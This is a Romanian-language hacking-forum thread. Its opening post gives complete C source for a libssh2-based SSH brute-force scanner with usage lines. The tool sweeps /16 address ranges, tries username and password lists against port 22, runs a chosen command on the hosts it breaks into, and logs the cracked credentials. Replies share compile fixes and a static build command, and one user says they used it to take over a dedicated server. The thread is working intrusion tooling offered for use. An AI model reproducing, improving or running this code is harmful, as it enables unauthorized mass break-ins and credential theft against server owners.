JIHAD Posted August 31, 2014 Report Posted August 31, 2014 (edited) Salut,Scanner-ul foloseste libssh2 (libssh2), pscan.c(inclus in codul sursa).Se ruleaza ptr. scan clasa B: ./brute -b 10.10 -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a"Ptr. brute lista ip: ./brute -f ip.lst -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a"-t = numarul de thread-uri-p = portul-c = "comanda de executatip.lst = lista ip-uri cate unul per randuser.lst = lista users, cate unu per rand, pass.lst = lista parole, cate una per randin pass.lst daca puneti $user, atunci parola va fi ca userul, daca puneti $user123, parola va fi, user123, de ex:user: oraclepass: $user123scannerul va incerca oracle:oracle123Sper sa va placa.Initial avea si generare de IP-uri random, dar am scos. Reverificati codul sursa daca va apar erori la compilare.#define LIBSSH2_STATIC 1#include "libssh2_config.h"#include <libssh2.h>#ifdef HAVE_WINSOCK2_H# include <winsock2.h>#endif#ifdef HAVE_SYS_SOCKET_H# include <sys/socket.h>#endif#ifdef HAVE_NETINET_IN_H# include <netinet/in.h>#endif#ifdef HAVE_SYS_SELECT_H# include <sys/select.h>#endif# ifdef HAVE_UNISTD_H#include <unistd.h>#endif#ifdef HAVE_ARPA_INET_H# include <arpa/inet.h>#endif#include <sys/time.h>#include <sys/types.h>#include <stdlib.h>#include <fcntl.h>#include <string.h>#include <errno.h>#include <stdio.h>#include <ctype.h>#include <netdb.h>#include <time.h>#include <sys/wait.h>#include <termios.h>#define ALB "\033[1;37m"#define ALB2 "\033[5;37m"#define NORM "\033[00;00m"#define BOLD "\033[00;01m"#define ROSU "\033[01;31m"#define GALBE "\033[01;33m"#define VERDE "\033[01;32m"#define ALBASTRU "\033[01;34m"#define FAKE "./jahid" #define COMPUTATIONS 3000#define TOTAL_VAL_COUNT 254#define MAX_SOCKETS 1000#define TIMEOUT 3#define S_NONE 0#define S_CONNECTING 1#define TABLELEN 63#define BUFFFERLEN 128#define ENCODERLEN 4#define ENCODEROPLEN 0#define ENCODERBLOCKLEN 3#define PADDINGCHAR '='#define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\ "abcdefghijklmnopqrstuvwxyz"\ "0123456789"\ "+/";#define _FILE_OFFSET_BITS 64#define EOL '\n'#define CAR_RETURN '\r'#define SUCCESS 0#define FAILURE -1struct conn_t { int s; char status; time_t a; struct sockaddr_in addr;};struct conn_t connlist[MAX_SOCKETS];void init_sockets(void);void check_sockets(void);void fatal(char *);FILE *outfd;int tot = 0;int flag,where;int numforks,maxf;unsigned char denominator = TOTAL_VAL_COUNT+1;char *replace_str(char *str, char *orig, char *rep){ static char buffer[4096]; char *p; if(!(p = strstr(str, orig))) return str; strncpy(buffer, str, p-str); buffer[p-str] = '\0'; sprintf(buffer+(p-str), "%s%s", rep, p+strlen(orig)); return buffer;}void init_sockets(void){ int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } return;}void check_sockets(void){ int i, ret; for (i = 0; i < MAX_SOCKETS; i++) { if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING)) { close(connlist[i].s); connlist[i].status = S_NONE; } else if (connlist[i].status == S_CONNECTING) { ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr, sizeof(struct sockaddr_in)); if (ret == -1) { if (errno == EISCONN) { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } if ((errno != EALREADY) && (errno != EINPROGRESS)) { close(connlist[i].s); connlist[i].status = S_NONE; } } else { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } } }}void fatal(char *err){ int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) if (connlist[i].status >= S_CONNECTING) close(connlist[i].s); fclose(outfd); exit(EXIT_FAILURE);}static int waitsocket(int socket_fd, LIBSSH2_SESSION *session){ struct timeval timeout; int rc; fd_set fd; fd_set *writefd = NULL; fd_set *readfd = NULL; int dir; timeout.tv_sec = 2; timeout.tv_usec = 0; FD_ZERO(&fd); FD_SET(socket_fd, &fd); dir = libssh2_session_block_directions(session); if(dir & LIBSSH2_SESSION_BLOCK_INBOUND) readfd = &fd; if(dir & LIBSSH2_SESSION_BLOCK_OUTBOUND) writefd = &fd; rc = select(socket_fd + 1, readfd, writefd, NULL, &timeout); return rc;} int checkauth(char *username,char *password,char *hostname, char *portar, char *command) { const char *commandline = command; FILE *vulnf,*nolog; unsigned long hostaddr; int sock, port; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; int rc; int exitcode; char *exitsignal=(char *)"none"; int bytecount = 0; size_t len; int type, var; struct timeval timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; port=atoi(portar); rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } hostaddr = inet_addr(hostname); sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.s_addr = hostaddr; if (setsockopt (sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { return -1; } session = libssh2_session_init(); while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { return -1; } while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { goto shutdown; } while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { goto shutdown; } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( rc != 0 ) { goto shutdown; } for( ;; ) { int rc; do { char buffer[65535]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 ) { int i; bytecount += rc; hostname = strtok (hostname, "\n"); fprintf(stderr, "[*] WOW : %s:%s %s port: %s \n", username,password,hostname, portar); fprintf(stderr, "[*] Kernel: %s \n", buffer); vulnf=fopen("sparte.txt","a+"); fprintf(vulnf,"%s:%s %s port: %s --> %s \n",username,password,hostname,portar, buffer); fclose(vulnf); goto shutdown; for( i=0; i < rc; ++i ) var = i; } else { if( rc != LIBSSH2_ERROR_EAGAIN ) goto shutdown; } } while( rc > 0 ); if( rc == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } else break; } exitcode = 127; while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN ) waitsocket(sock, session); if( rc == 0 ) { exitcode = libssh2_channel_get_exit_status( channel ); libssh2_channel_get_exit_signal(channel, &exitsignal, NULL, NULL, NULL, NULL, NULL); } if (exitsignal) var = var; else var = var; libssh2_channel_free(channel); close(sock); channel = NULL; libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); libssh2_exit(); exit(0);shutdown: libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session);#ifdef WIN32 closesocket(sock);#else close(sock);#endif var = var; libssh2_exit(); return 0; }int scanbclass(char *bclass, char *port){int done = 0, i, cip = 1, bb = 0, ret, k, ns, x; time_t scantime; char ip[20], outfile[128], last[256]; int unlink(const char *pathname); errno = 0; if(unlink("scan.log")) { printf("\n unlink() failed - [%s]\n",strerror(errno)); } memset(&outfile, 0, sizeof(outfile)); snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port); if (!(outfd = fopen(outfile, "a"))) { perror(outfile); exit(EXIT_FAILURE); } printf("[-] Searching: ", bclass); fflush(stdout); memset(&last, 0, sizeof(last)); init_sockets(); scantime = time(0); while(!done) { for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if (bb == 255) { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) done = 1; break; } else { cip = 0; bb++; for (x = 0; x < strlen(last); x++) putchar('\b'); memset(&last, 0, sizeof(last)); snprintf(last, sizeof(last) - 1, "%s.%d.* on port: %s [Found: %d] [%.1f%% Done]", bclass, bb, port, tot, (bb / 255.0) * 100); printf("%s", last); fflush(stdout); } } if (connlist[i].status == S_NONE) { connlist[i].s = socket(AF_INET, SOCK_STREAM, 0); if (connlist[i].s == -1) printf("Unable to allocate socket.\n"); else { ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK); if (ret == -1) { printf("Unable to set O_NONBLOCK\n"); close(connlist[i].s); } else { memset(&ip, 0, 20); sprintf(ip, "%s.%d.%d", bclass, bb, cip); connlist[i].addr.sin_addr.s_addr = inet_addr(ip); if (connlist[i].addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist[i].addr.sin_family = AF_INET; connlist[i].addr.sin_port = htons(atoi(port)); connlist[i].a = time(0); connlist[i].status = S_CONNECTING; cip++; } } } } check_sockets(); } printf("\n[!] Scanning complete In %u Seconds. [We got %d ips]\n", (time(0) - scantime), tot); fclose(outfd); return 1;}int line_count(char* __str_file_name) { FILE* fd; int ch; if ((fd = fopen(__str_file_name, "r")) == NULL) { printf("[Error] : While opening the file\n"); exit(0); } unsigned int line_count = 0; while ( (ch = fgetc(fd)) != EOF) if (ch == EOL || ch == CAR_RETURN) ++line_count; if (fd) { fclose(fd); } return line_count;}int scan(char *app, char *thr, char *ipfile, char *userfile, char *passfile, char *portar, char *commandline){ int numforks, maxf, status; FILE *fp,*passf, *userf; char buff[4096]; char nutt2[4096]; char nutt[4096]; char *pass, *user; malloc(sizeof(nutt)); malloc(sizeof(nutt2)); malloc(sizeof(buff)); pid_t PID; char *ns = NULL; maxf=atoi(thr); if((userf=fopen(userfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", userfile)); while (fgets(nutt2,sizeof(nutt2),userf)){ user = strdup (nutt2); user = strtok (user, "\n"); if((passf=fopen(passfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", passfile)); while (fgets(nutt,sizeof(nutt),passf)) { pass = strdup (nutt); pass = strtok (pass, "\n"); ns = replace_str(pass, "$user", user); printf("[*] Trying: %s:%s on found ips\n",user,ns); if((fp=fopen(ipfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s", ipfile)); while(fgets(buff,sizeof(buff),fp)) { PID = fork(); if (PID < 0) { fprintf(stderr, "[!] Couldn't fork!\n"); exit(1); } if (( PID == 0 )){ checkauth(user,ns,buff, portar, commandline); //printf("[*] Trying: %s:%s %s:%s Protocol:%s\n",user,ns, buff,portar,prot); exit(0); } else { numforks++; if (numforks > maxf) for (numforks; numforks > maxf; numforks--) PID = wait(&status); } } fclose(fp); } fclose(passf); } fclose(userf);exit(0);}int main(int argc, char *argv[]){ int input,i=0; FILE *fp,*passf, *userf, *scanf; char encodedoutput[BUFFFERLEN + 1] = ""; char decodedoutput[BUFFFERLEN + 1] = ""; char *userfile, *passfile, *command, *threads, *scanfile, *bclass, *port, *t2, *prot; if(strcmp(argv[1],"-f")==0) { input = 1; } if(strcmp(argv[1],"-r")==0) { input = 2; } if(strcmp(argv[1],"-R")==0) { input = 3; } if(strcmp(argv[1],"-b")==0) { input = 4; } switch ( input ) { case 1: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } scanfile = argv[2]; if((scanf=fopen(scanfile,"r"))!= NULL){ if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scan(argv[0],threads,scanfile,userfile,passfile,port,command);} else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 2: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { //genrand(argv[0],threads,userfile,passfile,port,command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 3: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { //genrandl(threads, port); } else { goto err; } } else { goto err; } break; case 4: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } bclass = argv[2]; if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scanbclass(bclass, port); scan(argv[0],threads,"scan.log",userfile,passfile,port, command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; default: printf( "Bad command, quitting!\n" ); exit (0); break; } getchar(); exit (0); err: exit (-1);}JIHAD! Edited August 31, 2014 by JIHAD 1
TheOne Posted August 31, 2014 Report Posted August 31, 2014 O sa-l incerc, revin cu edit, mersi deocamndata.
TheOne Posted August 31, 2014 Report Posted August 31, 2014 doar deocamdata? Stii care-i beleaua? Eu am passfile gen: root:password ... sursa ta e ceva gen hydra. Pot face ceva sa-mi faca brute la root:password?
JIHAD Posted August 31, 2014 Author Report Posted August 31, 2014 poti face, ai functia scan, incarci doar passfile, bagi un split la fiecare linie cu separator ":" si ai user si pass.succes.
Htich Posted September 1, 2014 Report Posted September 1, 2014 @misefalfaie este postat de el si toata arhiva de scan , nu doar sursa din cate imi amintesc.
TheOne Posted September 1, 2014 Report Posted September 1, 2014 poti face, ai functia scan, incarci doar passfile, bagi un split la fiecare linie cu separator ":" si ai user si pass.succes. Pai si comanda va fi : ./brute -f ip.lst -t 1800 -pass pass.lst -p 22 -c "uname -a" nu ?
JIHAD Posted September 1, 2014 Author Report Posted September 1, 2014 trebuie sa modifici sa nu mai ai atatea argumente, si in main si in scan.
rockes Posted September 5, 2014 Report Posted September 5, 2014 Can you give a .exe files? I compile it out, suggesting can't find libssh2.h , thx , my email 4748499@gmail.com
bostonacc Posted September 6, 2014 Report Posted September 6, 2014 Initial avea si generare de IP-uri random -Am nevoie de toate ipurile existente de la 1 la 255 ? putea scaneru asta sa faca treaba asta?sau daca nu merge cum as putea sa fac ? dami mesaj priv ca sa vad ms mult salut
cezarboy11 Posted September 7, 2014 Report Posted September 7, 2014 merge perfect am lauat un dedicat superb
sTzzz Posted November 5, 2014 Report Posted November 5, 2014 (edited) Mie imi da asa ceva la compilare. Help?brute.c: In function 'check_sockets':brute.c:141: warning: cast to pointer from integer of different sizebrute.c:156: warning: cast to pointer from integer of different size Edited November 5, 2014 by sTzzz
oldTeam Posted November 30, 2014 Report Posted November 30, 2014 JIHAD, salut, foarte bun codul, dar am o problema la compilarea lui, se compileaza fara libssh2.so.1 inclus in sursa. si pe alte rooturi nu merge daca nu este instalata libssh2. imi poti da un sfat sa o pot compila cu libssh2.so inclus in proiect ? astept PM. ms anticipat 1
JIHAD Posted December 8, 2014 Author Report Posted December 8, 2014 am dat sursa, merge, e ok, restul va descurcati si singuri.
meow Posted December 8, 2014 Report Posted December 8, 2014 i get this error file.c:2:28: fatal error: libssh2_config.h: No such file or directorycompilation terminated.
kNigHt Posted December 8, 2014 Report Posted December 8, 2014 (edited) i get this error file.c:2:28: fatal error: libssh2_config.h: No such file or directorycompilation terminated.[] ~ $ locate libssh2_config.h/usr/share/doc/libssh2-1-dev/examples/libssh2_config.h.in.gz[] ~ $ cp /usr/share/doc/libssh2-1-dev/examples/libssh2_config.h.in.gz /tmp[] ~ $ cd /tmp[] /tmp $ gunzip libssh2_config.h.in.gz[] /tmp $ cp libssh2_config.h /locatia/catre/sursa/taFii sigur ca ai libssh2 development headers (libssh2-1-dev in cazul meu, pe debian).Make sure you have libssh2 development headers (libssh2-1-dev on my debian system). Edited December 8, 2014 by kNigHt
kNigHt Posted December 8, 2014 Report Posted December 8, 2014 Daca nu exista fisierul "scan.log", apare urmatoarea eroare: "unlink() failed - [No such file or directory]"Fix:Incepand cu linia 398, replace: if(unlink("scan.log")) { printf("\n unlink() failed - [%s]\n",strerror(errno)); }Cu: if(access("scan.log", F_OK) != -1) { if(unlink("scan.log")) { printf("\n unlink() failed - [%s]\n",strerror(errno)); } }Spor
JIHAD Posted December 8, 2014 Author Report Posted December 8, 2014 ma bucur cand vad ca mai scrie cineva si cate o rezolvare, nu doar intrebari. bv.
x00x Posted December 8, 2014 Report Posted December 8, 2014 (edited) // Edited December 12, 2014 by x00x
x00x Posted December 8, 2014 Report Posted December 8, 2014 (edited) // Edited December 12, 2014 by x00x
JIHAD Posted December 8, 2014 Author Report Posted December 8, 2014 Comanda de compilare static.gcc -o brute jihad.c -I /usr/local/include/ -L /usr/local/lib/ -static -lssh2 -lssl -lcrypto -ldl -lz -lpthread
JIHAD Posted December 8, 2014 Author Report Posted December 8, 2014 nu te supara, dar si eu am incercat sa o compilez aseara , e greu de compilat pentru un incepator, defapt foarte greu, daca tot ai facut-o publica, ajuta-i pana la capat altfel e doar o sursa postata si atat. fac pariu ca doar maxim 10 persoane cu +- au reusit sa o compileze sunt de parere ca e doar un copy paste ..Pai un incepator in loc sa dea ./a ip.ip mai bine ar invata treburi elementare, sursa a fost postata la programare, nu ca arhiva. Vba aia, daca esti prost, stai acasa.
x00x Posted December 9, 2014 Report Posted December 9, 2014 (edited) // Edited December 12, 2014 by x00x
SS666Valium Posted December 9, 2014 Report Posted December 9, 2014 Verific si revin cu edit, pare interesant.
